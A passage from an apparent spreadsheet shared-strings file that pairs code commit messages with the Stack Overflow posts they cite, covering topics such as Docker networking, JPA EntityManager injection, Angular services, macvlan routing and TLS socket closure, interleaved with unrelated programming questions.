  up: (queryInterface, Sequelize) =&gt;
    queryInterface.addColumn('Books', 'Rating', {
      allowNull: false,
      type: Sequelize.ENUM('like', 'dislike')
  }),
  down: (queryInterface, Sequelize) =&gt;  
    queryInterface.removeColumn('Books', 'Rating')
      .then(() =&gt; queryInterface.sequelize.query('DROP TYPE "enum_Books_Rating";'));
  };
Hope this helps.</t>
  </si>
  <si>
    <t xml:space="preserve">I've been asked to investigate a design for an ASP.NET (not MVC) application using a service oriented architecture.
This seems a bit wolly and could mean a lot of things. I'm looking for some guidance/articles on this topic to get me started.
</t>
  </si>
  <si>
    <t>C841</t>
  </si>
  <si>
    <t>Testing some code
code is from: https://stackoverflow.com/questions/28308584/connecting-two-computers-for-client-server-communication-in-java</t>
  </si>
  <si>
    <t>Client Just needs the IP of the Server.
You have to find out the IP of the server and tell the client about it, like:
String serverName = "IP of server comes here";  // Indicating the place to put Server's IP
s = new Socket(serverName, 10);
Server needs no change.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a NextJS application (App Router) which includes a Route Handler which triggers generation of a PDF. This process takes a while, which causes the main thread to stall.&lt;/p&gt;
&lt;p&gt;The application runs as an Azure Container App and this causes the application to be terminated as the container app can't get any liveness response from it.&lt;/p&gt;
&lt;p&gt;I've tried to offload the operation into a node.js worker thread. This seems to work but the problem is that the route handler exits prematurely. Do anyone know if is is possible to wait for the thread to finish (using e.g. await og Promise)?&lt;/p&gt;
&lt;p&gt;The code I have so far is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export async function POST(req: NextRequest) {
    &amp;lt;snip&amp;gt;
      const worker = new Worker(
    /* webpackChunkName: &amp;quot;pdfGenerator.worker&amp;quot; */ new URL(
      '../../../../pdf/pdfGenerator.tsx',
      import.meta.url,
    ),
  );
  worker.postMessage(message);
  worker.on('message', (result: CreatePDFResponse) =&amp;gt; {
    if (result.result === 'ok') {
      &amp;lt;Return response with PDF&amp;gt;
    } else {
      &amp;lt;return error&amp;gt;
    }
  });
  worker.on('error', (error) =&amp;gt; {
    &amp;lt;return error&amp;gt;
  });
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but I have not found a way to actually wait for the worker.no to fire, instead the route handler just exits.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C842</t>
  </si>
  <si>
    <t>Introduce docker network: mesh
Based on https://stackoverflow.com/questions/38088279/communication-between-multiple-docker-compose-projects</t>
  </si>
  <si>
    <t>You just need to make sure that the containers you want to talk to each other are on the same network. Networks are a first-class docker construct, and not specific to compose.
# front/docker-compose.yml
services:
  front:
    ...
    networks:
      - some-net
networks:
  some-net:
    driver: bridge
...
# api/docker-compose.yml
services:
  api:
    ...
    networks:
      - front_some-net
networks:
  front_some-net:
    external: true
Note: Your app’s network is given a name based on the “project name”, which is based on the name of the directory it lives in, in this case a prefix
front_
was added
They can then talk to each other using the service name. From
front
you can do
ping api
and vice versa.</t>
  </si>
  <si>
    <t xml:space="preserve">In a website, I need to integrate membership and authentication. So I want to use the functionality of ASP.NET Membership, but I have other custom stuff, that a "user" has to do. 
So I am sitting here with my pencil and paper, drawing lines for my domain model... And how can I best utilize the ASP.Net membership, but extend it to fill my needs?
Should I create a class that inherits from a MembershipUser and extend it with my own properties and methods (and save this in a seperate table). Or should I let the MembershipUser be a property on my custom User/Client object?
What would be a good solid way to do this?
</t>
  </si>
  <si>
    <t>C843</t>
  </si>
  <si>
    <t>fix: You shouldn't use @Autowired. @PersistenceContext takes care to create a unique EntityManager for every transaction (communication with the database).
https://stackoverflow.com/questions/31335211/autowired-vs-persistencecontext-for-entitymanager-bean</t>
  </si>
  <si>
    <t>You shouldn't use @Autowired. @Autowired normally would create just one bean of EntityManager to be used for the entire application. But we need a new EntityManager object for every communication (database transaction) with the database. In this communication we can make multiple actions: inserts, deletes, updates, reads, which need to happen under the same context (the persistence context) isolated from other similar contexts that can happen in the same time.
@PersistenceContext takes care to create a unique EntityManager for every transaction (communication with the database). In a production application you can have multiple clients calling your application in the same time. For each call, the application will create a new thread, will open/create a new transaction with the database and will assign a separate persistence context. Each thread, in this case, must use its own EntityManager.
Conclusion:
Please also check the ACID four key properties of a transaction: atomicity, consistency, isolation, and durability. Conclusion: The PersistenceContext is the context for each transaction and makes those four properties be possible.
Other thread related properties of the EntityManager:
usually the EntityManager or Session are bound to the thread (implemented as a ThreadLocal variable).
Source: https://stackoverflow.com/a/42074452/2623162
EntityManager instances are not thread-safe. 
Source: https://docs.oracle.com/cd/E19798-01/821-1841/bnbqy/index.html
Other info related to the @PersistenceContext
Please notice that @PersistenceContext annotation comes from javax.persistence package, not from spring framework. In JavaEE it is used by the JavaEE container (aka the application server) to inject the EntityManager. Spring borrowed the PersistenceContext annotation to do the same: to inject an application-managed (= not container-managed) EntityManager bean per thread, exactly as the JavaEE container does.
UPDATE:
I updated the answer because it was confusing. Thank you, @silver_mx - his comment bellow</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is the error that I'm getting when running my app on a iPhone Emulator on my mac:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;[cloud_firestore/unavailable] The service is currently unavailable. This is a most likely a transient condition and may be corrected by retrying with a backoff.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'm initializing my Firebase Connection in main.dart correctly.&lt;/p&gt;
&lt;p&gt;My flutter doctor:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Doctor summary (to see all details, run flutter doctor -v):
[âœ“] Flutter (Channel stable, 3.29.0, on macOS 15.3.1 24D70 darwin-arm64, locale de-DE)
[âœ“] Android toolchain - develop for Android devices (Android SDK version 35.0.1)
[âœ“] Xcode - develop for iOS and macOS (Xcode 16.2)
[âœ“] Chrome - develop for the web
[âœ“] Android Studio (version 2024.2)
[âœ“] VS Code (version 1.97.2)
[âœ“] Connected device (4 available)
[âœ“] Network resources
â€¢ No issues found!
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Firebase Plugins:
firebase_core: ^3.12.0
firebase_messaging: ^15.2.2
firebase_auth: ^5.4.2
cloud_firestore: ^5.6.4
firebase_analytics: ^11.4.2
firebase_crashlytics: ^4.3.2
firebase_storage: ^12.4.2&lt;/p&gt;
&lt;p&gt;Firebase Services like Authentication and Storage are working, only the Firestore isn't working.&lt;/p&gt;
&lt;p&gt;Things I've tried:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Testing on android emulator&lt;/li&gt;
&lt;li&gt;Running with verbose (no extra information)&lt;/li&gt;
&lt;li&gt;setting up firebase again (from scratch)&lt;/li&gt;
&lt;li&gt;testfile with simple logic, not working aswell&lt;/li&gt;
&lt;li&gt;Resetting iOs Emulator&lt;/li&gt;
&lt;li&gt;Deleting Pods&lt;/li&gt;
&lt;li&gt;Deleting Pubspec.lock&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is very odd, this is the first time im getting this error and i work with flutter &amp;amp; firebase for 5 years now. What could be the problem here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C844</t>
  </si>
  <si>
    <t>Implement TCP server
Establish connection with Python client using https://stackoverflow.com/questions/4185242/communication-between-python-client-and-java-server</t>
  </si>
  <si>
    <t>Append \n to the end of data:
client_socket.send(data + '\n')</t>
  </si>
  <si>
    <t xml:space="preserve">I've tried looking everywhere for a concise list of the advantages and disadvantages of using Flex vs. Flash. 
Coming from a programming background, I absolutely love Flex. It's easy to pick up, and since it can use flash classes, why would I want to use Flash without flex?
Flex:
Pros:
good for RIA development
provides many user-input options out of the box
Build in lay-outing system
the MXML is easier for non-programmers
You can quickly combine components to create small applications
components can provide an advantage in large-scale projects because of their modular 
nature.
can be developed using linux
has a nice component lifecycle for validation, etc.
Cons:
increases the size of your .swf
Customizing the look of components can take a lot longer than anticipated, depending on the visual style you're looking for
when you find out you need a custom component that doesn't exist, you might need to go back to Flash to do the real programming work and packaging of the component
The "flexibility" of Flex means you will be reading a lot of documentation
Bugs in the Flex framework
You eventually will need to compromise with the architecture of the Flex framework
Flash
Pros:
good for making movies/animations
Timeline can be easier for designers/animators to conceptualize
when working from scratch, provides a great deal of control.
easier for someone with a programming background
You can program whatever you like; no compromises with existing frameworks
Cons:
only provides basic user input (text box) out of the box.
timeline can be daunting for programmers (although you can quite safely ignore it)
Development of certain types of applications will be slower than with Flex
can't be developed using linux
user input validation must all be handled in the code. No built-in validation.
need to implement your own lay-outing system
Please correct me if I missed anything said so far.
</t>
  </si>
  <si>
    <t>C845</t>
  </si>
  <si>
    <t>Improve file operation intro
Done while answering: https://stackoverflow.com/questions/3290590/what-options-do-we-have-for-communication-between-a-user-program-and-a-linux-ker/51206012#51206012</t>
  </si>
  <si>
    <t>Your option 3) is really a sub-option of option 1) -
ioctl()
is one way of interacting with a device file (
read()
and
write()
being the usual ways).
Two other ways worth considering are:
The
sysfs
filesystem;
Netlink sockets.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an entity with an attribute called &amp;quot;plainText&amp;quot; which stores text of type &amp;quot;String&amp;quot;.&lt;/p&gt;
&lt;p&gt;I want to fetch the objects based on a custom sort descriptor which is used in &lt;strong&gt;fetchedResultscontroller's&lt;/strong&gt; fetch.&lt;/p&gt;
&lt;p&gt;Example :- I have objects which has plainText containing &lt;strong&gt;&amp;quot;He&amp;quot;, &amp;quot;When&amp;quot;, &amp;quot;Whenever&amp;quot;&lt;/strong&gt;, when I search for words which contains &lt;strong&gt;&amp;quot;He&amp;quot;&lt;/strong&gt;, The first object should be the object which has &amp;quot;He&amp;quot; i.e exact match. followed by other matches.&lt;/p&gt;
&lt;p&gt;My fetch looks like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var fetch: NSFetchRequest&amp;lt;CoreNote&amp;gt; = CoreNote.fetchRequest()
fetch.predicate = NSPredicate(format: &amp;quot;plainText CONTAINS[c] %@&amp;quot;, searchString)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As I am using &lt;strong&gt;fetchedResultsController&lt;/strong&gt;, I should not process the objects after the fetch happens.&lt;/p&gt;
&lt;p&gt;refer this :- &lt;a href="https://stackoverflow.com/a/13045887/8409258"&gt;https://stackoverflow.com/a/13045887/8409258&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C846</t>
  </si>
  <si>
    <t>feat: Add new network interface to allow host-&gt;container communication
By design, the `macvlan` network type does allow communication between
the host and devices on the network. This means that the host cannot
talk to the containers on the services or vice versa. This is now an
issue as I want to retrieve metrics and other observability data from
the services.
In order to allow this we need to create a new `macvlan` network in
bridge mode, add an interface, and then assign a static route from the
host to this interface.
Big ups:
 * Barebones commands: https://stackoverflow.com/a/57038734/147284
 * Explanation why this doesn't work: https://stackoverflow.com/a/44049431/147284
 * Skeleton NixOS config: https://github.com/NixOS/nixpkgs/blob/62f746b630d5189b2eedc19688ddcfb8021c1c71/nixos/tests/containers-macvlans.nix</t>
  </si>
  <si>
    <t>You can do this by doing the following:
ip link add foobar link enp7s0 type macvlan mode bridge
ip addr add 192.168.9.252/32 dev foobar
ip link set foobar up
ip route add 192.168.9.228/32 dev foobar
Where:
enp7s0 - Name of your physical adapter
192.168.9.252/32 - Genuine new IP on your network
192.168.9.228/32 - IP of the container using macvlan
Please be aware that this will not survive reboots, so you will need to script it to run each reboot or use another method to make it persistent</t>
  </si>
  <si>
    <t xml:space="preserve">Unlike Java, why does C# treat methods as non-virtual functions by default?  Is it more likely to be a performance issue rather than other possible outcomes?
I am reminded of reading a paragraph from Anders Hejlsberg about several advantages the existing architecture is bringing out. But, what about side effects? Is it really a good trade-off to have non-virtual methods by default?
</t>
  </si>
  <si>
    <t>C847</t>
  </si>
  <si>
    <t>- weitergemacht Service zu implementieren anhand beispiel von
http://stackoverflow.com/questions/4300291/example-communication-between-activity-and-service-using-messaging</t>
  </si>
  <si>
    <t>Look at the LocalService example.
Your Service returns an instance of itself to consumers who call onBind. Then you can directly interact with the service, e.g. registering your own listener interface with the service, so that you can get callbacks.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 2 DataFrame with different columns and want to merge to csv without comma for the one having single column.&lt;/p&gt;
&lt;p&gt;How can we remove comma for the one having single column?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import pandas as pd
# 1st DataFrame with single column
pd_title = pd.DataFrame(['Category: A', ''])
# 2nd DataFrame with double columns 
data = [
  [&amp;quot;Date&amp;quot;, &amp;quot;Value&amp;quot;],
  ['2025-01-01', 50],
  ['2025-01-02', 40],
  ['2025-01-03', 45]
]
result = pd_title._append(data).reset_index(drop=True)
result.to_csv('/content/test.csv', index=False, header=False)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The result from code :&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/A2Q3atC8.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/A2Q3atC8.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The result what I mean :&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/6HFVrS6B.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/6HFVrS6B.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C848</t>
  </si>
  <si>
    <t>Parent/child communication via service
But don't do is this way. See:
http://stackoverflow.com/a/34402906/1998086</t>
  </si>
  <si>
    <t>Update: I have found a better/proper way to solve this problem using a BehaviorSubject or an Observable rather than an EventEmitter. Please see this answer: https://stackoverflow.com/a/35568924/215945
Also, the Angular docs now have a cookbook example that uses a Subject.
Original/outdated/wrong answer: again, don't use an EventEmitter in a service.  That is an anti-pattern.
Using beta.1... NavService contains the EventEmiter.  Component Navigation emits events via the service, and component ObservingComponent subscribes to the events.
nav.service.ts
import {EventEmitter} from 'angular2/core';
export class NavService {
  navchange: EventEmitter&lt;number&gt; = new EventEmitter();
  constructor() {}
  emitNavChangeEvent(number) {
    this.navchange.emit(number);
  }
  getNavChangeEmitter() {
    return this.navchange;
  }
}
components.ts
import {Component} from 'angular2/core';
import {NavService} from '../services/NavService';
@Component({
  selector: 'obs-comp',
  template: `obs component, item: {{item}}`
})
export class ObservingComponent {
  item: number = 0;
  subscription: any;
  constructor(private navService:NavService) {}
  ngOnInit() {
    this.subscription = this.navService.getNavChangeEmitter()
      .subscribe(item =&gt; this.selectedNavItem(item));
  }
  selectedNavItem(item: number) {
    this.item = item;
  }
  ngOnDestroy() {
    this.subscription.unsubscribe();
  }
}
@Component({
  selector: 'my-nav',
  template:`
    &lt;div class="nav-item" (click)="selectedNavItem(1)"&gt;nav 1 (click me)&lt;/div&gt;
    &lt;div class="nav-item" (click)="selectedNavItem(2)"&gt;nav 2 (click me)&lt;/div&gt;
  `,
})
export class Navigation {
  item = 1;
  constructor(private navService:NavService) {}
  selectedNavItem(item: number) {
    console.log('selected nav item ' + item);
    this.navService.emitNavChangeEvent(item);
  }
}
Plunker</t>
  </si>
  <si>
    <t xml:space="preserve">I've read the questions on S.O. regarding Singleton and just watched an hour long google tech talk.  As far as I can tell, the consensus in the OO world seems to be that singletons are more of an anti-pattern rather than a useful design pattern.
That said, I am interviewing these days and the question comes up a lot--what is a singleton, and how would you use it?
What is the best way to answer this question?  Should I simply describe the design pattern and then say the only acceptable use I've heard of is for logging, and that it is often mis-used for global state?
</t>
  </si>
  <si>
    <t>C849</t>
  </si>
  <si>
    <t>Don't shutdown half TLS connection after sending.
The underlying TLS layer still needs to send this close_notify packet before
really shutting down the communication, otherwise, it will be considered as
a truncation attack.
https://tools.ietf.org/html/rfc2246#section-7.2.1
https://stackoverflow.com/questions/6424998/properly-closing-sslsocket</t>
  </si>
  <si>
    <t>This was my initial (temporarily deleted) answer, but it was apparently not good enough, since it was -2'ed quite quickly... I guess I should add more explanations.
It's not possible to close half of the connection for SSL/TLS sockets to comply with the TLS protocol, as specified in the
section on closure alerts
.
The client and the server must
share knowledge that the connection is
ending in order to avoid a truncation
attack. Either party may    initiate
the exchange of closing messages.
close_notify
This message notifies the recipient that the sender will not
send any more messages on this connection. The session becomes unresumable if any connection is terminated without proper close_notify messages with level equal to warning.
Either party may initiate a close
by sending a close_notify alert.
Any data received after a closure
alert is ignored.
Each party is required to send a
close_notify alert before closing
the write side of the connection. It
is required that the other party
respond with a close_notify alert of
its own and close down the
connection immediately, discarding any
pending writes. It is not required
for the initiator of the close to wait
for the responding    close_notify
alert before closing the read side of
the connection.
Although you may want to close only half of the connection (input or output via
shutdownInput()
/
shutdownOutput()
), the underlying TLS layer still needs to send this
close_notify
packet before really shutting down the communication, otherwise, it will be considered as a truncation attack.
The fix is quite simple: only use
close()
on
SSLSocket
s: it doesn't just close the connection as it would for normal TCP sockets, but it does it cleanly according to the SSL/TLS specification.
EDIT
:
Additional explanations
.
The short answer is still: use
close()
, you may also need to find out when it's appropriate to do so from the protocol on top of SSL/TLS.
(Just to clarify, what you're trying to do is effectively a "Man-In-The-Middle" (MITM) proxy. You would need the client to be configured to trust the proxy's certificate, possibly as if it was the server certificate if this is meant to happen transparently. How HTTPS connections work through an HTTP proxy is a
different question
.)
In some of your comments to your
other related question
, I got the impression that you thought that not returning
-1
was "breaking the TLS protocol". This isn't really about the protocol, but about the API: the way programming structures (classes, methods, functions, ...) are provided to (programmer) user of the TLS stack to be able to use of TLS.
SSLSocket
is merely part of an API to provide programmers with the ability to use SSL/TLS in a way similar to plain
Socket
. The TLS specification doesn't talk about sockets at all.
While TLS (and its precessor, SSL) were built with the aim to make it possible to provide this sort of abstraction, at the end of the day
SSLSocket
is just that: an abstraction.
In line with the OOP design principles,
SSLSocket
inherits
Socket
and tries to stick as closely as possible to the behaviour of
Socket
. However, because of the way SSL/TLS works (and because an
SSLSocket
effectively sits on top of a normal
Socket
), there cannot be an exact mapping of all features.
In particular, the area of transition from a normal TCP socket to an SSL/TLS socket can't quite be modelled transparently.
Some arbitrary choices (e.g. how the handshake takes place) had to be made when designing the
SSLSocket
class:
it's a compromise between not (a) exposing too much of the specificity of TLS to the
SSLSocket
user, (b) making the TLS mechanism work and (c) mapping all this to the existing interface provided by the superclass (
Socket
).
These choices inevitably have some impact on the functionality of the
SSLSocket
, and that's why its
Javadoc API page
has a relatively large amount of text.
SSLSocket.close()
, in terms of API, has to abide by the description of
Socket.close()
.
The
InputStream
/
OutputStream
obtained from the
SSLSocket
are not the same as the one from the underlying plain
Socket
,which (unless
you've converted it explicitly
) you might not see.
SSLSocket
is designed to be usable as closely as possibly as if it was a plain
Socket
, and the
InputStream
you get is designed to behave as closely as possibly to a file-based input stream.
This isn't specific to Java, by the way. Even Unix sockets in C are used with a file descriptor and
read()
.
These abstractions are convenient and work most of the time, so long as you know what their limitations are.
When it comes to
read()
, even in C, the notion of
EOF
comes from an end-of-file termination, but you're not actually dealing with files.
The problem with TCP sockets is that, while you can detect when the remote party has chosen to close the connection when it sends
FIN
, you can't detect it hasn't, if it doesn't send anything.
When reading nothing from a socket, there is no way to tell the difference between an inactive and a broken connection.
As such, when it comes to network programming, relying on reading
-1
from the
InputStream
if fine, but you never rely solely on that, otherwise you may end up with unreleased, dead connections.
While it's "polite" for a party to close the half TCP connection properly (in a way such as the remote party reads
-1
on its
InputStream
or something equivalent, as described in
Orderly Versus Abortive Connection Release in Java
), handling this case isn't sufficient.
This is why protocols on top of TCP are generally
designed to give an indication as to when they're done sending data
: for example,
SMTP sends
QUIT
(and has specific terminators), HTTP 1.1 uses
Content-Length
or chunked encoding.
(By the way, if you're not satisfied with the abstraction provided by
SSLSocket
, try to use
SSLEngine
directly. It's likely to be harder, and it won't change what the TLS specification says about sending
close_notify
.)
In general with TCP, you should know, at the application protocol level, when to stop sending and receiving data (to avoid unreleased connections and/or relying on timeout errors).
This sentence in the TLS specification makes this generally good practice a stronger requirement when it comes to TLS:
"
It is required that the other party respond with a close_notify alert of its own and close down the connection immediately discarding any pending writes.
"
You will have to synchronize somehow, via the application protocol, or the remote party may still have something to write (especially if you're allowing pipelined requests/responses).
If the proxy you're writing is for intercepting HTTPS connections (as a MITM), you can look into the content of the requests. Even if the HTTP requests are pipelined, you can count the number of responses sent by
the target server (and expect when they end, via Content-Length or chunks delimiters).
However, you won't be able to have a purely transparent, generic TLS "interceptor".
TLS is designed to secure the transport between two parties and not to have one in the middle.
While most of the mechanism to achieve that protection (avoiding a MITM) is done via the server certificate, some other TLS mechanisms will get in the way (closure alert is one of them).
Remember that you're effectively creating two distinct TLS connections, the fact that they're hard to merge as one shouldn't be surprising, considering the purpose of TLS.
SSLSocket.close()
is the right way to close an
SSLSocket
, but the application protocol will also help you determine when it's appropriate to do so.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I create an application with QML. The data will be provided from C++ with a QAbstractTableModel class. But the display in QML is not formatted correctly.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/UDzhpvJE.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/UDzhpvJE.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;QML of the main view:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import QtQuick
import QtQuick.Controls
import SK 1.0
import assets 1.0
import components 1.0
Item {
    Rectangle {
        id: windowBox
        anchors.fill: parent
        Image {
            width: parent.width
            height: parent.height
            source: Style.imageBackground
        }
        ScrollView {
            id: scrollView
            anchors {
                left: parent.left
                right: parent.right
                top: parent.top
                bottom: commandBar.top
                margins: Style.sizeScreenMargin
            }
            clip: true
            HeaderBoxCol {
                id: headerBox
                headerText: &amp;quot;Administration&amp;quot;
                anchors.top: parent.top
                anchors.left: parent.left
                anchors.right: parent.right
            }
            AdminBox {
                id: adminBox
                headerText: &amp;quot;Admin&amp;quot;
                anchors.top: headerBox.bottom
                anchors.topMargin: 15
                anchors.left: parent.left
                anchors.right: parent.right
            }
         }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;QML of AdminBox:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import QtQuick
import QtQuick.Controls
import QtQuick.Layouts
import SK 1.0
import assets 1.0
import components 1.0
Panel {
    width: parent.width*0.9
    x: 15
    contentComponent:
        Column {
            width: parent.width
            spacing: Style.sizeControlSpacing
            Row {
                // Spieler Liste
                id: row1
                spacing: Style.sizeControlSpacing
                width: parent.width
                TableViewSpieler {
                    widthValue: Style.widthDataControls*4
                    setWidthValue: true
                }
            }
            Row {
                // Tarif Liste
                id: row2
                spacing: Style.sizeControlSpacing
                width: parent.width
                TableViewTarif {
                    widthValue: Style.widthDataControls*4
                    setWidthValue: true
                }
            }
            Row {
                // Tisch Liste
                id: row3
                spacing: Style.sizeControlSpacing
                width: parent.width
                TableViewTisch {
                    widthValue: Style.widthDataControls*4
                    setWidthValue: true
                }
            }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;QML of the TableView:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import QtQuick
import QtQuick.Controls
import SK 1.0
import assets 1.0
Item {
    property int widthValue
    property bool setWidthValue
    height: Style.heightDataControls * 7
    width: (setWidthValue) ? (widthValue+Style.widthDataControls) : (parent.width/widthValue) - 10
    Rectangle {
        id: header
        width: Style.widthDataControls
        height: Style.heightDataControls
        color: Style.colourBackground
        Text {
            id: textLabel
            anchors {
                fill: parent
                margins: Style.heightDataControls / 4
            }
            text: &amp;quot;Spieler Liste&amp;quot;
            color: Style.colourDataControlsFont
            font.pixelSize: Style.pixelSizeDataControls
            verticalAlignment: Qt.AlignVCenter
        }
    }
    HorizontalHeaderView {
        id: horizontalHeader
        anchors.top: header.bottom
        anchors.left: tableViewId.left
        height: Style.heightDataControls * 2
        syncView: tableViewId
        clip: true
    }
    VerticalHeaderView {
        id: verticalHeader
        anchors.top: tableViewId.top
        anchors.left: parent.left
        syncView: tableViewId
        clip: true
    }
   TableView {
        id: tableViewId
        anchors.left: verticalHeader.right
        anchors.top: horizontalHeader.bottom
        anchors.right: parent.right
        anchors.bottom: parent.bottom
        topMargin: horizontalHeader.implicitHeight
        columnSpacing: 1
        rowSpacing: 1
        boundsBehavior: Flickable.StopAtBounds
        model: masterController.uiSpieler.uiSpielerListe
        delegate:  Label {
            text: model.tabledata
            width: 100
            padding: 12
            Rectangle {
                anchors.fill: parent
                color: &amp;quot;#efefef&amp;quot;
                z: -1
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Class SpielerTable:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SpielerTable::SpielerTable(QObject *parentArg)
    : QAbstractTableModel {parentArg}
{
}
SpielerTable::~SpielerTable()
{
}
int SpielerTable::rowCount(const QModelIndex &amp;amp;) const
{
    return table.size();
}
int SpielerTable::columnCount(const QModelIndex &amp;amp;) const
{
    return ColCount;
}
QVariant SpielerTable::data(const QModelIndex &amp;amp;indexArg, int roleArg) const
{
    switch (roleArg)
    {
    case TableDataRole:
    {
        return table.at(indexArg.row()).at(indexArg.column());
    }
    default:
        break;
    }
    return QVariant();
}
QVariant SpielerTable::headerData(int sectionArg, Qt::Orientation orientationArg, int roleArg) const
{
    if (roleArg != Qt::DisplayRole)
    {
        return QVariant();
    }
    if (orientationArg == Qt::Horizontal &amp;amp;&amp;amp; sectionArg == 0)
    {
        return &amp;quot;Id&amp;quot;;
    }
    else if (orientationArg == Qt::Horizontal &amp;amp;&amp;amp; sectionArg == 1)
    {
        return &amp;quot;Name&amp;quot;;
    }
    else if (orientationArg == Qt::Horizontal &amp;amp;&amp;amp; sectionArg == 2)
    {
        return &amp;quot;Nick&amp;quot;;
    }
    if (orientationArg == Qt::Vertical)
    {
        return QVariant::fromValue(sectionArg + 1);
    }
    return QVariant();
}
QHash&amp;lt;int, QByteArray&amp;gt; SpielerTable::roleNames() const
{
    QHash&amp;lt;int, QByteArray&amp;gt; roles = QAbstractTableModel::roleNames();
    roles[TableDataRole] = &amp;quot;tabledata&amp;quot;;
    // roles[SomeOtherRole] = &amp;quot;someotherrole&amp;quot;; // You can set up multiple mappings if needed
    return roles;
}
QVariant SpielerTable::get_display_data(const QModelIndex &amp;amp;indexArg)
{
    return data(indexArg, TableDataRole);
}
void SpielerTable::addListe(const QJsonObject &amp;amp;listeArg)
{
    uint16_t anz {static_cast&amp;lt;uint16_t&amp;gt;(listeArg[&amp;quot;anz&amp;quot;].toInt())};
    for (uint16_t i = 0; i &amp;lt; anz; ++i)
    {
        QJsonObject obj {listeArg[&amp;quot;spieler&amp;quot;].toArray().at(i).toObject()};
        struct StructSpieler spieler {};
        table.append({obj[&amp;quot;id&amp;quot;].toString(), obj[&amp;quot;name&amp;quot;].toString(), obj[&amp;quot;nick&amp;quot;].toString()});
    }
}
void SpielerTable::clearListe()
{
    qDebug() &amp;lt;&amp;lt; &amp;quot;&amp;gt;&amp;gt; SpielerTable &amp;gt; clearListe (&amp;quot; &amp;lt;&amp;lt; __LINE__ &amp;lt;&amp;lt; &amp;quot;)&amp;quot;;
    table.clear();
}
struct StructSpieler SpielerTable::getPos(uint16_t posArg)
{
    struct StructSpieler temp {};
    temp.id = table[posArg].at(0).toInt();
    temp.name = table[posArg].at(1);
    temp.nick = table[posArg].at(2);
    return temp;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What can I do, that the tables didn't overlapp the header during scrolling and has a bottom margin?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C85</t>
  </si>
  <si>
    <t>override django admin templates of video apps
extends djang admin templates and override
refer to http://stackoverflow.com/questions/6583877/how-to-override-and-extend-basic-django-admin-templates</t>
  </si>
  <si>
    <t>Update:
Read the Docs for your version of Django, e.g. the latest version  or old LTS versions: 3.2, 2.2, 1.11
Original answer from 2011:
I had the same issue about a year and a half ago and I found a nice template loader on djangosnippets.org that makes this easy. It allows you to extend a template in a specific app, giving you the ability to create your own admin/index.html that extends the admin/index.html template from the admin app. Like this:
{% extends "admin:admin/index.html" %}
{% block sidebar %}
    {{block.super}}
    &lt;div&gt;
        &lt;h1&gt;Extra links&lt;/h1&gt;
        &lt;a href="/admin/extra/"&gt;My extra link&lt;/a&gt;
    &lt;/div&gt;
{% endblock %}
I've given a full example on how to use this template loader in a blog post on my website.</t>
  </si>
  <si>
    <t>override django admin templates of video apps
extends djang admin templates and override
refer to
http://stackoverflow.com/questions/6583877/how-to-override-and-extend-basic-django-admin-templates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Iâ€™d like to know why I get and how to correct the following error&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;(./Feb-15-wheel-cal-fro-teach (minex1).aux)
./Feb-15-wheel-cal-fro-teach (minex1).tex:37: Undefined control sequence.
\pgfkeyscurrentkey -&amp;gt;\WCvarB&lt;/p&gt;
&lt;p&gt;l.37 }&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;received when compiling the code below. [When I go to scroll mode, the code compiles and generates an image that looks like I want.]&lt;/p&gt;
&lt;p&gt;when running this code (based on modifying &lt;a href="https://tex.stackexchange.com/questions/678852/wheel-calendar-template"&gt;the code here&lt;/a&gt; by @&lt;a href="https://tex.stackexchange.com/users/290058/matexmatics"&gt;matexmatics&lt;/a&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;\documentclass[border=6pt]{standalone}
\usepackage{wheelchart}
\begin{document}
\begin{tikzpicture}
\sffamily
%%%%%%%%%%%%%%%%%%%%%%%%%%%
\pgfkeys{
  /wheelchart,
  arc data dir=1,
  arc data expand=f,
  arc data pos=0.5,
  arc data sep=0,
  data=,
  domain=450:90,
  plot={{#1}:{#2+0.00416*(450-#1)}},
  value=1,
  wheel data pos=0.5,
  wheel data style={
    align=center,
